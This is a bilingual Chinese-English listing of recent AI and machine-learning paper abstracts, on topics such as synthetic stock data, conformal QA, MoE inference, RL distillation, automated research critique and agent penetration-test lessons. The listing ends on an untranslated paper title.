近年来,金融机构和公司越来越多地采用合成数据来解决数据稀缺问题并生成反事实市场情景。然而,再现金融时间序列的所有统计特性(通常称为典型事实)对于许多现有的通用架构来说仍然是一个开放的挑战。在本文中,我们提出了一种质量感知生成框架,该框架结合了两类生成方法,展示了它们的集成如何解决现有局限性,同时增强合成数据的真实性。具体来说,我们首先引入CoMeTS-GAN(相关多变量时间序列GAN),这是一种条件生成对抗网络(C-GAN),旨在联合生成相关股票的中价和成交量时间序列。然后,我们展示了如何将我们的GAN架构整合到最先进的扩散模型中,以提高生成的相关结构的质量。具体来说,GAN的Critic作为一个质量评估模块,指导扩散过程,在生成的时间序列中强制执行学习到的相关结构。我们的框架为真实的股票市场模拟提供了一种轻量级且响应迅速的解决方案,明确建模了资产间的相关结构。我们通过实验将我们的框架与领先的生成架构进行了比较,表明它更有效地捕捉了股票市场的典型事实并建模了资产间的相关性。

英文摘要

In recent years, financial institutions and firms have increasingly adopted synthetic data to address data scarcity and to generate counterfactual market scenarios. However, reproducing all the statistical properties of financial time series, commonly known as stylized facts, remains an open challenge for many existing general-purpose architectures. In this paper, we present a quality-aware generative framework that combines two classes of generative methods, demonstrating how their integration addresses existing limitations while enhancing the realism of synthetic data. Specifically, we first introduce CoMeTS-GAN (Correlated Multivariate Time Series GAN), a Conditional Generative Adversarial Network (C-GAN) designed to jointly generate mid-price and volume time-series for correlated stocks. We then show how our GAN architecture can be incorporated into state-of-the-art diffusion models to enhance the quality of generated correlation structures. Specifically, the GAN's Critic serves as a quality evaluation module that guides the diffusion process, enforcing learned correlation structures in the generated time-series. Our framework offers a lightweight and responsive solution for realistic stock market simulation, explicitly modeling inter-asset correlation structures. We experimentally validate our framework against leading generative architectures, showing that it more effectively captures the stylized facts of stock markets and models inter-asset correlations.

2605.27091 2026-05-27 cs.CL cs.AI 版本更新

MiRD: Reliable Set-Valued Prediction for Open-Ended Question Answering via Miscoverage Risk Decomposition

MiRD:通过误覆盖风险分解实现开放式问答的可靠集值预测

Anqi Hu, Zhiyuan Wang, Zijun Jia, Bo Fu

发表机构 * University of Electronic Science and Technology of China(电子科学与技术大学) Beihang University(北航)

AI总结 提出MiRD两阶段框架,通过将整体误覆盖分解为采样失败和条件选择失败,在开放式问答中实现可靠的集值预测,控制采样风险和条件选择风险,并产生更紧的边界和更自适应的预测集。

详情
AI中文摘要

可靠的集值预测为缓解开放式问答中的幻觉提供了一种原则性方法,但现有的共形方法通常依赖于一个脆弱的假设:有限采样必须已经产生至少一个可接受的候选,或者违反此条件的校准示例被丢弃。在本文中,我们介绍了MiRD,一个两阶段框架,将整体误覆盖分解为采样失败和条件选择失败。在第一阶段,MiRD在固定预算下,对有限采样不产生可接受答案的概率建立了一个期望水平的边际上界。在第二阶段,基于采样成功,MiRD使用在整个校准集上定义的与接受性相关的非一致性分数来校准共形选择阈值,从而保持校准集的完整性。在三个开放式问答数据集和八个模型上,MiRD控制了采样风险、条件选择风险和整体误覆盖,同时产生了比PAC风格替代方案更紧的第一阶段边界,以及比仅成功校准更自适应的预测集。

英文摘要

Reliable set-valued prediction provides a principled way to mitigate hallucinations in open-ended question answering (QA), yet existing conformal approaches typically rely on a fragile premise: finite sampling must already produce at least one admissible candidate, or calibration examples violating this condition are discarded. In this paper, we introduce MiRD, a two-stage framework that decomposes overall miscoverage into sampling failure and conditional selection failure. In Stage I, MiRD establishes an expectation-level marginal upper bound on the probability that finite sampling produces no admissible answer under a fixed budget. In Stage II, conditioned on sampling success, MiRD calibrates a conformal selection threshold using admission-correlated nonconformity scores defined over the full calibration set, thereby preserving calibration-set integrity. Across three open-ended QA datasets and eight models, MiRD controls sampling risk, conditional selection risk, and overall miscoverage, while yielding tighter first-stage bounds than PAC-style alternatives and more adaptive prediction sets than successful-only calibration.

2605.27082 2026-05-27 cs.AI 版本更新

Can Broad Biomedical Knowledge be Contextualized into Scenario-Grounded Propositions?

广泛的生物医学知识能否被情境化为基于场景的命题?

Qingyuan Zeng, Ziyang Chen, Pengxiang Cai, Zixin Guan, Anglin Liu, Lang Qin, Xinyao Lai, Jintai Chen

发表机构 * The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州)) Guangzhou University of Chinese Medicine(广州中医药大学)

AI总结 提出SCENE双层多智能体框架,通过迭代搜索将广泛生物医学知识转化为证据支持的场景化命题,并在临床试验和LINCS L1000研究中验证其有效性。

详情
AI中文摘要

生物医学发现通常需要将广泛的生物医学知识与特定的实验或临床数据联系起来。背景知识提示相关机制,但通常过于泛化,无法直接映射到数据集变量;而数据驱动模式可能具有数据集特异性且难以从机制上解释。我们将这一缺失环节研究为知识情境化:将广泛的生物医学知识转化为有证据支持的、基于场景的命题,供领域专家检查、重现和验证。我们提出SCENE,一个双层多智能体框架,将知识情境化视为迭代搜索。上层将广泛知识转化为搜索方向,并将其锚定在数据集模式中。下层通过多目标优化执行这些方向,以识别在证据强度和数据支持之间取得平衡的具体命题。两层之间的反馈逐步细化搜索。我们在两个场景中评估SCENE:在临床试验场景中发现具有异质性治疗益处的患者亚组,以及在LINCS L1000研究中识别特定情境下的生物学反应。在临床试验中,SCENE发现了具体且支持充分的亚组,并优于现有基线。在L1000研究中,SCENE识别出具有强靶标-响应匹配和高阳性率的扰动情境。这些结果表明,SCENE弥合了广泛知识与场景特定证据之间的差距,为后续验证生成了可追溯、可检查的假设。

英文摘要

Biomedical discovery often requires connecting broad biomedical knowledge with specific experimental or clinical data. Background knowledge suggests relevant mechanisms but is usually too general to map directly onto dataset variables, while data-driven patterns can be dataset-specific and hard to interpret mechanistically. We study this missing link as knowledge contextualization: transforming broad biomedical knowledge into evidence-supported, scenario-grounded propositions that domain experts can inspect, replay, and validate. We propose SCENE, a bi-level multi-agent framework that treats knowledge contextualization as iterative search. The upper level converts broad knowledge into search directions and grounds them in the dataset schema. The lower level executes these directions through multi-objective optimization to identify concrete propositions that balance evidential strength and data support. Feedback between the two levels progressively refines the search. We evaluate SCENE in two settings: discovering patient subgroups with heterogeneous treatment benefits in clinical trial scenarios, and identifying context-specific biological responses in LINCS L1000 studies. In clinical trials, SCENE discovers specific, well-supported subgroups and outperforms existing baselines. In L1000 studies, SCENE identifies perturbational contexts with strong target-response matching and high positive rates. These results show that SCENE bridges broad knowledge and scenario-specific evidence, producing traceable, inspectable hypotheses for follow-up validation.

2605.27081 2026-05-27 cs.LG cs.AI cs.DC 版本更新

ReMoE: Boosting Expert Reuse through Router Fine-Tuning in Memory-Constrained MoE LLM Inference

ReMoE: 在内存受限的MoE大模型推理中通过路由器微调提升专家重用

Xiongwei Zhu, Xiaojian Liao, Tianyang Jiang, Yusen Zhang, Liang Wang, Limin Xiao

发表机构 * School of Computer Science and Engineering, Beihang University, Beijing 100191, China(北京航空航天大学计算机科学与工程学院) Huawei Technologies Ltd(华为技术有限公司)

AI总结 提出ReMoE路由器微调框架,通过偏向近期选中的专家实现时间稳定的路由,减少专家从外部存储的获取次数,在保持下游任务性能的同时提升专家重用26%,并在实际系统中实现8.4%的吞吐量提升和1.77-1.99倍的解码加速。

Comments Accepted at the 43rd International Conference on Machine Learning (ICML 2026)

详情
AI中文摘要

细粒度混合专家(MoE)模型对每个token仅稀疏激活一部分专家,在保持高模型容量的同时减少激活计算。然而,在内存受限的推理场景中,只能缓存少量专家。未缓存的专家必须从慢速外部存储(如UFS)获取,导致频繁的驱逐和大量的I/O开销。我们提出ReMoE,一个路由器微调框架,旨在提升token级别的专家重用。ReMoE使路由器偏向近期选中的专家,产生时间稳定的路由,更好地匹配缓存局部性约束。通过增加短时专家重用,ReMoE减少了从存储中获取专家,且不增加推理计算开销。在DeepSeek和Qwen模型上的实验表明,ReMoE在保持下游任务性能的同时将专家重用提升了26%。实际系统评估进一步证实了这些优势:在vLLM GPU-CPU专家卸载下,输出吞吐量提升8.4%;在Jetson Orin NX上的llama.cpp中,TPOT降低43.6-49.8%,对应不同工作负载下1.77-1.99倍的解码加速。检查点和使用说明见https://github.com/BUAA-OSCAR/ReMoE。

英文摘要

Fine-grained Mixture-of-Experts (MoE) models sparsely activate only a subset of experts per token, reducing activated computation while maintaining high model capacity. However, in memory-constrained inference scenarios, only a small set of experts can be cached. Experts not in the cache must be fetched from slow external storage (e.g., UFS), leading to frequent evictions and substantial I/O overhead. We propose ReMoE, a router fine-tuning framework designed to boost token-wise expert reuse. ReMoE biases the router toward recently selected experts, producing temporally stable routing that better matches cache locality constraints. By increasing short-horizon expert reuse, ReMoE reduces expert fetches from storage without adding inference-time computation. Experiments on DeepSeek and Qwen models show that ReMoE improves expert reuse by 26% while maintaining downstream task performance. Real-system evaluations further confirm these benefits, improving output throughput by 8.4% under vLLM GPU-CPU expert offloading and reducing TPOT by 43.6-49.8% under llama.cpp on Jetson Orin NX, corresponding to a 1.77-1.99$\times$ decode speedup across diverse workloads. Checkpoints and usage instructions are available at https://github.com/BUAA-OSCAR/ReMoE.

2605.27079 2026-05-27 cs.LG cs.AI cs.RO 版本更新

Trust Region Q Adjoint Matching

信任区域Q伴随匹配

Yonghoon Dong, Kyungmin Lee, Changyeon Kim, Jaehyuk Kim, Jinwoo Shin

发表机构 * KAIST AI(韩国科学技术院人工智能) Seoul National University(首尔国立大学) RLWRLD

AI总结 针对预训练流策略的离策略强化学习不稳定性,提出信任区域Q伴随匹配方法,通过投影对偶下降自适应控制路径空间KL散度,实现稳定微调,在50个OGBench任务中离线RL成功率达68%。

详情
AI中文摘要

由于多步采样过程带来的优化不稳定性,预训练流策略的离策略强化学习仍然具有挑战性。最近,带有伴随匹配的Q学习(QAM)通过将问题重新表述为一个具有学习评论家的无记忆随机最优控制(SOC)问题来解决这一问题。然而,QAM继承了评论家引导改进的根本脆弱性:当评论家病态时,小的评论家误差会被放大,通常导致模型崩溃。本文引入了信任区域Q伴随匹配(TRQAM),一种稳定的离策略微调算法,通过投影对偶下降自适应地控制与预训练流策略的路径空间KL散度。具体来说,我们优化SOC动力学中的信任区域参数$λ$,并从理论上证明路径空间KL可以用$λ$的闭式函数表示。因此,我们的方法可以精确控制与预训练流策略的精确偏差,实现稳定的离策略强化学习。通过在50个OGBench任务上的实验,TRQAM在离线强化学习和离线到在线强化学习中都持续优于先前的方法。特别是,TRQAM在离线强化学习中实现了68%的总体成功率,显著提高了最强基线的46%。

英文摘要

Off-policy reinforcement learning of pretrained flow policies remains challenging due to the instability of optimization arising from the multi-step sampling process. Recently, Q-learning with Adjoint Matching (QAM) addressed this issue by reformulating into a memoryless stochastic optimal control (SOC) problem with a learned critic. However, QAM inherits a fundamental fragility of critic-guided improvement: small critic errors are amplified when critics are ill-conditioned, often leading to model collapse. This paper introduces Trust Region Q-Adjoint Matching (TRQAM), a stable off-policy fine-tuning algorithm that adaptively controls the path-space KL with pretrained flow policies through projected dual descent. Specifically, we optimize the trust-region parameter $λ$ in SOC dynamics, and theoretically show that the path-space KL can be represented by a closed-form function of $λ$. As a result, our method can precisely control the exact deviation from pretrained flow policies, achieving stable off-policy RL. Through experiments on 50 OGBench tasks, TRQAM consistently outperforms prior arts in both offline RL and offline-to-online RL. In particular, TRQAM achieves an overall success rate of 68% in offline RL, substantially improves the strongest baseline at 46%.

2605.27072 2026-05-27 cs.CL cs.AI 版本更新

E3: Issue-Level Backtesting for Automated Research Critique

E3: 面向自动化研究评论的问题级回测

Yashwardhan Chaudhuri, Sanyam Jain, Paridhi Mundra

AI总结 提出E3自动化评论助手,通过问题级回测协议评估其在识别研究论文技术问题上的表现,相比人类评审和LLM基线实现最高召回率。

详情
AI中文摘要

我们提出E3,一个自动化评论助手,通过识别研究论文中与决策相关的技术问题来增强评审者和工程团队。对于每个问题,E3报告其性质、位置、对贡献的影响以及解决该问题所需的分析或证据,涵盖无根据的主张、缺失的消融实验、弱基线、隐藏假设、有效性威胁和数据泄露风险。为了在没有污染混杂因素的情况下评估E3,我们采用问题级回测协议:语料库仅限于每个自动化来源训练截止日期之后发表的论文,并且对于每篇论文,一个仅观察匿名评审的元裁判将每个问题-来源对标记为“捕获”、“部分”或“遗漏”。应用于100篇ICLR 2026论文和4598个被评判的问题行,将E3与ICLR人类评审以及基于OpenAI的gpt-5.4和Anthropic的claude-opus-4-6构建的两个提示匹配的LLM基线进行比较,使用元裁判gpt-5.5,E3在每个聚合指标上达到最高召回率。包含部分的召回率达到90.2%,比GPT高15.5个百分点,比Claude高17.1个百分点,比人类评审高29.2个百分点,严格召回率保持顺序为65.8%。在人类评审提出的问题上,E3恢复了89.6%;在人类评审遗漏的问题上,它额外发现了1635行被纳入评判联合集,比次优来源多406行。语料库、基线提示、裁判提示模板和评估代码已发布。

英文摘要

We present E3, an automated review assistant that augments reviewers and engineering teams by identifying decision-relevant technical concerns in research papers. For each concern, E3 reports its nature, its location, its bearing on the contribution, and the analysis or evidence that would resolve it, covering unsupported claims, missing ablations, weak baselines, hidden assumptions, threats to validity, and leakage risks. To evaluate E3 without contamination confounds we adopt an issue-level backtesting protocol: the corpus is restricted to papers postdating the training cutoff of every automated source, and for each paper a meta-judge that observes only anonymised reviews labels every issue-source pair as Caught, Partial, or Missed. Applied to 100 ICLR 2026 papers and 4598 judged issue rows, comparing E3 against the ICLR human reviews and two prompt-matched LLM baselines built on gpt-5.4 from OpenAI and claude-opus-4-6 from Anthropic, with meta-judge gpt-5.5, E3 attains the highest recall on every aggregate metric. Partial-inclusive recall reaches 90.2 percent, which is 15.5 points over GPT, 17.1 points over Claude, and 29.2 points over the human reviews, and strict recall preserves the ordering at 65.8 percent. On concerns raised by the human reviewers, E3 recovers 89.6 percent; on concerns the human reviewers missed it surfaces 1635 additional rows admitted into the judged union, 406 above the next-best source. Corpus, baseline prompts, judge prompt template, and evaluation code are released.

2605.27071 2026-05-27 cs.AI 版本更新

Traceable Knowledge Graph Reasoning Enables LLM-Assisted Decision Support for Industrial VOCs in the Steel Industry

可溯源知识图谱推理助力钢铁行业工业VOCs的LLM辅助决策支持

Changqing Su, Yu Ding, Zuhong Lin, Hongyu Liu, Xi He, Zheng Zeng, Liqing Li

发表机构 * Hunan Key Laboratory of Carbon Neutrality and Intelligent Energy, School of New Energy and Environment, Hunan University of Technology and Business(湖南碳中和与智能能源重点实验室,新能环境学院,湖南科技商务大学) Aerospace Kaitian Environmental Technology Co., Ltd.(航天凯天环境科技有限公司) School of Energy Science and Engineering, Central South University(能源科学与工程学院,中南大学)

AI总结 针对钢铁行业VOCs治理知识分散、通用大模型易产生幻觉的问题,提出基于知识图谱增强的多智能体问答系统Chat-ISV,通过拓扑优化、多智能体路由和源回溯检索实现高可靠性决策支持。

详情
AI中文摘要

钢铁行业挥发性有机化合物(VOCs)治理的关键知识分散在非结构化的科学文献中,使得整合工艺、污染物和控制技术证据变得困难,并增加了通用大语言模型(LLM)在回答低频工业问题时产生幻觉的风险。为此,我们开发了Chat-ISV,一个知识图谱(KG)增强的多智能体问答系统,该系统解析精选的钢铁行业VOCs文献语料库,构建包含27180个节点和81779条语义边的Neo4j知识图谱,并结合提示约束提取、以块为中心的拓扑优化、多智能体路由、源回溯检索、本地文献检索、开放域知识访问和交互式子图可视化。基准测试和400份专家盲评表明,拓扑优化将孤立节点从57%降至4.08%,Chat-ISV实现了高事实可靠性,精确率96.93%,召回率72.63%,F1分数0.830,平均得分1.69/2.00。通过将碎片化的环境工程文献转化为可溯源、可查询、面向决策支持的知识,Chat-ISV为专业工业领域中可靠的LLM部署和智能污染控制决策支持建立了一种可扩展的环境信息学范式。

英文摘要

Key knowledge for steel-industry volatile organic compounds (VOCs) governance is scattered across unstructured scientific literature, making it difficult to integrate process, pollutant, and control-technology evidence and increasing the risk of hallucination when general large language models (LLMs) answer low-frequency industrial questions. Here we developed Chat-ISV, a knowledge graph (KG) enhanced multi-agent Q&A system that parses a curated steel-industry VOCs literature corpus, constructs a Neo4j KG with 27180 nodes and 81779 semantic edges, and combines prompt-constrained extraction, chunk-centered topology optimization, multi-agent routing, source-backtracking retrieval, local literature retrieval, open-domain knowledge access, and interactive subgraph visualization. Benchmark tests and 400 expert blind evaluations showed that topology optimization reduced isolated nodes from 57% to 4.08% and that Chat-ISV achieved high factual reliability, with 96.93% precision, 72.63% recall, an F1-score of 0.830, and a mean score of 1.69/2.00. By converting fragmented environmental-engineering literature into traceable, queryable, and decision-support-oriented knowledge, Chat-ISV establishes a scalable environmental-informatics paradigm for reliable LLM deployment and intelligent pollution-control decision support in specialized industrial domains.

2605.27068 2026-05-27 cs.CL cs.AI cs.MA 版本更新

QUACK: Questioning, Understanding, and Auditing Communicated Knowledge in Multimodal Social Deduction Agents

QUACK: 多模态社交推理智能体中的沟通知识质疑、理解与审计

Ye Yuan, Rui Song, Weien Li, Zeyu Li, Haochen Liu, Xiangyu Kong, Changjiang Han, Yonghan Yang, Zichen Zhao, Zixuan Dong, Fuyuan Lyu, Bowei He, Haolun Wu, Jikun Kang, Xue Liu

发表机构 * McGill University(麦吉尔大学) Mila - Quebec AI Institute(魁北克人工智能研究所) University of Cambridge(剑桥大学) MBZUAI - Mohamed bin Zayed University of Artificial Intelligence(MBZUAI - 摩苏尔·本·扎耶德人工智能大学) University of Toronto(多伦多大学) Salesforce

AI总结 提出QUACK框架,通过游戏结果、行为轨迹和话语一致性三级评估,自动审计多模态社交推理智能体语言与感知行为的一致性,发现最强智能体仍有15.1%的空间幻觉和过半无据指控。

详情
AI中文摘要

社交推理游戏已成为探测大型语言模型智能体推理、欺骗、协调和信念建模的热门测试平台。然而,大多数环境仅通过胜率等游戏结果评分,且主要局限于纯文本交互,难以判断智能体的语言是否真正基于其感知和行动,也难以识别其行为背后的失败模式。为填补这一空白,我们引入了QUACK,一个用于审计多模态社交推理中智能体语言基础的开源环境和评估框架。QUACK在三个层面评估智能体:游戏结果、行为轨迹和话语级一致性。其核心的陈述验证流水线从引擎日志重建每个智能体的真实轨迹,并对照检查每个讨论声明,自动标记空间幻觉、无据指控、欺骗崩溃和语言-行动不一致。在同质和跨模型对抗设置下评估三个前沿视觉语言模型,我们发现即使是最强的智能体,其可验证的空间声明中有15.1%是幻觉,且超过一半的指控缺乏有据证据。我们在https://github.com/AAAAA-Academia-Attractions/QUACK发布完整的引擎、评估框架、工具包和日志。

英文摘要

Social deduction games have become a popular testbed for probing reasoning, deception, coordination, and belief modeling in Large Language Model (LLM) agents. However, most environments are scored only by game outcomes such as win rates and largely remain to text-only interaction, making it difficult to tell whether an agent's language is actually grounded in what it perceived and did, or to identify the failure modes underlying its behavior. To address this gap, we introduce QUACK, an open-source environment and evaluation framework for auditing the grounding of agent language in multimodal social reasoning. QUACK evaluates agents at three levels: game outcomes, behavioral trajectories, and utterance-level consistency. Its core Statement Verification Pipeline reconstructs each agent's ground-truth trajectory from engine logs and checks every discussion claim against it, automatically flagging spatial hallucination, unsupported accusation, deception collapse, and language-action inconsistency. Evaluating three frontier VLMs in both homogeneous and cross-model adversarial settings, we find that even the strongest agent hallucinates 15.1% of its verifiable spatial claims and makes over half of its accusations without grounded evidence. We release the full engine, evaluation framework, toolkit, and logs at https://github.com/AAAAA-Academia-Attractions/QUACK.

2605.27051 2026-05-27 cs.SE cs.AI 版本更新

ConVer: Using Contracts and Loop Invariant Synthesis for Scalable Formal Software Verification

ConVer:使用合约和循环不变式合成实现可扩展的形式化软件验证

Muhammad A. A. Pirzada, Weiqi Wang, Yiannis Charalambous, Konstantin Korovin, Lucas C. Cordeiro

发表机构 * The University of Manchester(曼彻斯特大学)

AI总结 提出一种自上而下的组合验证工具ConVer,利用大语言模型合成函数合约,并通过CEGAR-CEGIS循环迭代精炼合约,以解决大规模C程序形式化验证中的状态空间爆炸问题。

Comments 12 pages; 6 figures

详情
AI中文摘要

大型C程序的形式化验证受到状态空间爆炸的阻碍:有界模型检验(BMC)工具必须通过展开所有嵌套结构来编码整个状态空间直至预定边界。我们提出了ConVer,一种自上而下的组合验证工具。给定一个带有顶层断言的C程序,ConVer自上而下地分解验证:它使用大语言模型(LLM)从系统属性中合成函数合约,然后在CEGAR-CEGIS循环中交替进行系统级和函数级检查,每当检查失败时通过SMART ICE学习精炼合约。我们在四个难度递增的基准测试套件上评估了ConVer,并与其他最先进(SOTA)工具进行了比较。在包含45个简单C程序的Frama-C基准测试中,ConVer在三个LLM后端上实现了82-96%的验证成功率,其中93-95%的收敛程序仅需一次CEGAR-CEGIS迭代。在X.509解析器基准测试(6个程序)和LF2C-Simple套件(17个程序)上,ConVer分别实现了33-50%和82-88%的成功率。在包含11个递归和循环密集型程序的VerifyThis套件上,预抽象策略实现了55-64%的成功率。此外,我们提出了ESBMC-LF,一个预处理工具,它将LF模型转换为C语言,同时保留LF文件的属性,使ConVer能够验证它们。我们使用ESBMC-LF将LF验证器基准测试转换为C语言;我们将这些称为LF-Hard。我们表明,ConVer总体上成功验证了67%的LF-Hard基准测试。

英文摘要

Formal verification of large C programs is impeded by state-space explosion: Bounded Model Checking (BMC) tools must encode the entire state space up to the predetermined bound by unrolling all nested constructs. We present ConVer, a top-down compositional verification tool. Given a C program with a top-level assertion, ConVer decomposes verification top-down: it uses a large language model (LLM) to synthesise function contracts from the system property, then alternates system-level and function-level checks in a CEGAR-CEGIS loop, refining contracts whenever a check fails via SMART ICE learning. We evaluate ConVer on four benchmark suites of increasing difficulty and against other state-of-the-art (SOTA) tools. On the Frama-C benchmark of 45 simple C programs, ConVer achieves 82-96% verification success across three LLM backends, with 93-95% of converged programs requiring only a single CEGAR-CEGIS iteration. On the X.509 parser benchmark (6~programs) and LF2C-Simple suite (17 programs), ConVer achieves 33-50% and 82-88% success respectively. On the VerifyThis suite of 11 recursive and loop-intensive programs, the Pre-Abstraction strategy achieves 55-64% success. In addition, we present ESBMC-LF a preprocessor tool that converts LF models to C while preserving the properties of the LF files, enabling ConVer to verify them. We transpile the LF Verifier Benchmarks using ESBMC-LF to C; we denote those LF-Hard. We show that ConVer successfully verifies 67% of LF-Hard benchmarks overall.

2605.27042 2026-05-27 cs.CR cs.AI 版本更新

Lessons from Penetration Tests on Large-Scale Agent Systems

大规模智能体系统渗透测试的经验教训

Kevin Eykholt, Dhilung Kirat, Xiaokui Shu, Jiyong Jang, Frederico Araujo, Ian Molloy

发表机构 * IBM Research(IBM研究院)

AI总结 本文通过对2025年专有智能体产品的两次渗透测试,评估了AI智能体的安全态势是否有所改善,并指出许多安全漏洞并非全新,而是反映了先前计算系统中长期存在的重复性弱点类别。

Comments Accepted at SAGAI 2026

详情
AI中文摘要

随着AI系统获得越来越多的自主性和执行能力,发现的安全漏洞数量持续上升。然而,许多这些漏洞并非根本上的新颖,而是反映了先前计算系统中长期观察到的重复性弱点类别。具有执行能力的AI智能体实际上是无限的自修改程序,与计算栈的多个层进行广泛交互。这种广泛的交互表面给开发者带来了显著的安全负担,他们必须推理并保护复杂的跨层行为。先前的研究主要集中在开源智能体和智能体框架中的漏洞。相比之下,专有智能体系统——在更严格的编码标准和正式审查流程下开发——是否表现出类似的安全弱点仍不清楚。在本文中,我们展示了2025年对专有智能体产品进行的两次渗透测试的结果,并评估了自这些评估以来AI智能体的安全态势是否有所改善。

英文摘要

As AI systems gain increasing autonomy and execution capability, the number of discovered security vulnerabilities continues to rise. However, many of these vulnerabilities are not fundamentally novel, but instead reflect recurring classes of weaknesses long observed in prior computing systems. Execution-capable AI agents are effectively unbounded, self-modifying programs that interact extensively with multiple layers of the computing stack. This broad interaction surface imposes a significant security burden on developers, who must reason about and secure complex cross-layer behaviors. Prior research has primarily focused on vulnerabilities in open-source agents and agent frameworks. In contrast, it remains unclear whether proprietary agent systems -- developed under stricter coding standards and formal review processes -- exhibit similar security weaknesses. In this paper, we present findings from two penetration tests conducted in 2025 against proprietary agent products and evaluate whether the security posture of AI agents has improved since these assessments.

2605.27033 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Tracing Computation Density in LLMs

追踪LLMs中的计算密度

Corentin Kervadec, Iuliia Lysova, Iuri Macocco, Marco Baroni, Gemma Boleda

发表机构 * Universitat Pompeu Fabra(庞培法布拉大学) ICREA

AI总结 提出s-Trace方法估计最优子图,发现LLM计算分为早期稀疏核心和后期密集细化两个阶段,且计算量与模型不确定性相关。

详情
AI中文摘要

基于Transformer的大型语言模型(LLMs)由数十亿个参数组成,这些参数排列在深度和宽度都很大的计算图中,但尚不清楚它们是否对所有输入都充分利用了全部容量。我们引入了s-Trace方法,以有效估计最能近似完整模型输出的大小为s的子图。通过这种方法,我们发现各种LLM中的计算组织成两个不同的阶段。一个主要由早期层节点组成的小子图可以重建完整模型输出分布的头部。添加更多节点(主要位于后期层,且越来越多地由注意力头组成)会导致近似完整输出分布的逐步细化。此外,我们发现每个输入所需的计算量与模型不确定性相关,并且更稀疏的子图编码浅层统计信息,例如单字频率。总体而言,我们的结果表明,有效的LLM计算中存在一致的模块化组织,其中稀疏的早期层核心提供粗略预测,然后通过后期层中更密集的计算进一步细化。

英文摘要

Transformer-based large language models (LLMs) are comprised of billions of parameters arranged in deep and wide computational graphs, but it is not clear that they exploit their full capacity for all inputs. We introduce the s-Trace method to efficiently estimate the subgraph of size s that best approximates a full model output. With this method, we find the computation in a variety of LLMs to be organized in two distinct phases. A small subgraph mostly composed of early-layer nodes can reconstruct the head of the full model output distribution. Adding further nodes, mostly located in later layers and increasingly consisting of attention heads, leads to incremental refinements in approximating the full output distribution. We find moreover that the amount of necessary computation per input correlates with model uncertainty, and that sparser subgraphs encode shallow statistics, such as unigram frequency. Overall, our results suggest a consistent modular organization in effective LLM computation, with a sparse early-layer core providing a rough prediction that is further refined through denser computations in later layers.

2605.27028 2026-05-27 cs.LG cs.AI 版本更新

Less is More: Early Stopping Rollout for On-Policy Distillation

少即是多:用于在线策略蒸馏的早停展开

Zhou Ziheng, Jiaqi Li, Huacong Tang, Ying Nian Wu, Demetri Terzopoulos

发表机构 * University of California, Los Angeles(加州大学洛杉矶分校) Beijing Institute of General Artificial Intelligence(北京通用人工智能研究院)

AI总结 针对在线策略蒸馏中存在的“离策略教师衰减”问题,提出早停展开(ESR)方法,通过限制响应生成的前几个token来提升性能、GPU效率和训练稳定性。

详情
AI中文摘要

在线策略蒸馏最近成为标准序列级模仿的有前途的替代方案,通过使用教师模型对学生自身的展开进行评分来训练学生。然而,我们观察到这种范式中的“离策略教师衰减”问题:对于后面的token,由于学生的早期轨迹作为上下文对于教师来说是离策略的,教师产生纠正性分数的能力会衰减,并可能退回到预训练阶段学习的token补全行为。我们通过实验验证了这个问题,并提出了早停展开(ESR)来解决它:一种简单而有效的蒸馏策略,仅限制展开生成到前几个响应token。我们表明,ESR在模型大小、家族、任务和训练制度上均超越了全展开在线策略蒸馏的性能,并且在跨模型家族场景下表现出更高的GPU效率和训练稳定性。我们进一步研究了这一惊人性能背后的机制,发现了ESR的“级联对齐”和“子模式承诺”效应,这可能解释其为何有效,甚至有时超过教师模型性能。此外,我们表明这种基于位置的token选择策略不能完全由KL散度和熵信号解释。

英文摘要

On-policy distillation has recently emerged as a promising alternative to standard sequence-level imitation, training a student by scoring its own rollouts with a teacher model. However, we observe ``Off-policy Teacher Decay'' problem in this paradigm: for the later tokens, with student's earlier trajectory as context that is off-policy to the teacher, the teacher's ability to produce a corrective score would decay, and may fall back to token-completion behavior learned in the pre-training stage. We empirically verify this problem, and we propose Early Stopping Rollout (ESR) to fix it: a simple yet effective distillation strategy that simply restricts the rollout generation to the first response tokens. We show that ESR both surpasses the full rollout OPD performance across model size, family, tasks and training regime, and exhibit much higher GPU efficiency and training stability, especially under cross model family scenarios. We further investigate the mechanism behind this surprising performance and discovered "Cascading Alignment" and "Sub-mode Commitment" effect of ESR that may explain why it works effectively and even sometimes exceeding the teacher model performance. Besides, we show that this position-based token selection strategy cannot be fully explainable by KL divergence and entropy signals.

2605.27022 2026-05-27 cs.AI 版本更新

ORCA: An End-to-End Interactive Copilot for Optimized Root Cause Analysis

ORCA:一种用于优化根因分析的端到端交互式副驾驶

Phi Nguyen Xuan, Nicholas Tagliapietra, Lavdim Halilaj, Kristian Kersting, Juergen Luettin

发表机构 * Robert Bosch GmbH, Germany Bosch Global Software Technologies Company Limited, Vietnam Computer Science Department, TU Darmstadt, Germany Hessian Center for Artificial Intelligence (hessian.AI), Darmstadt German Center for Artificial Intelligence (DFKI)

AI总结 提出ORCA,一种端到端因果分析副驾驶,通过编排智能体理解用户目标并引导其完成从全自动到高度用户引导的因果分析工作流,涵盖因果发现、效应估计、可解释性和根因分析,并生成结构化报告。

详情
AI中文摘要

因果分析是制造、社会科学和医学等多个领域的关键任务。然而,尽管近期取得了进展,因果方法的概念和方法复杂性使得领域专家难以使用。这一差距阻碍了专家利用这些进展,并阻碍了缺乏真实世界数据进行验证的研究人员。为了弥合这一鸿沟,我们引入了ORCA,一种用于端到端因果分析的副驾驶。ORCA编排智能体以理解用户的目标,并引导他们完成最合适的因果分析工作流,从全自动到高度用户引导的执行。它具有因果发现、因果效应估计、可解释性和根因分析(RCA)功能。ORCA评估和比较性能,生成关键指标和图表,并通过结构化报告生成洞察。我们强调了它在几个真实世界用例中的有效性。

英文摘要

Causal analysis is a crucial task in many domains, including manufacturing, social science, and medicine. However, despite recent progress, the conceptual and methodological complexity of causal methods makes them largely inaccessible to domain experts. This gap prevents experts from leveraging these advances and hinders researchers who lack access to real-world data for validation. To bridge this divide, we introduce ORCA, a copilot for end-to-end causal analysis. ORCA orchestrates agents to understand the user's goals and guide them through the most appropriate causal analysis workflow, from fully automatic to highly user-guided execution. It features causal discovery, causal effect estimation, explainability and Root-Cause-Analysis (RCA). ORCA evaluates and compares performance, generates key metrics and diagrams, and generates insights through structured reports. We highlight its effectiveness across several real-world use-cases.

2605.27020 2026-05-27 cs.CV cs.AI 版本更新

Black-box Membership Inference Attacks on the Pre-training Data of Image-generation Models

黑盒成员推断攻击:针对图像生成模型的预训练数据

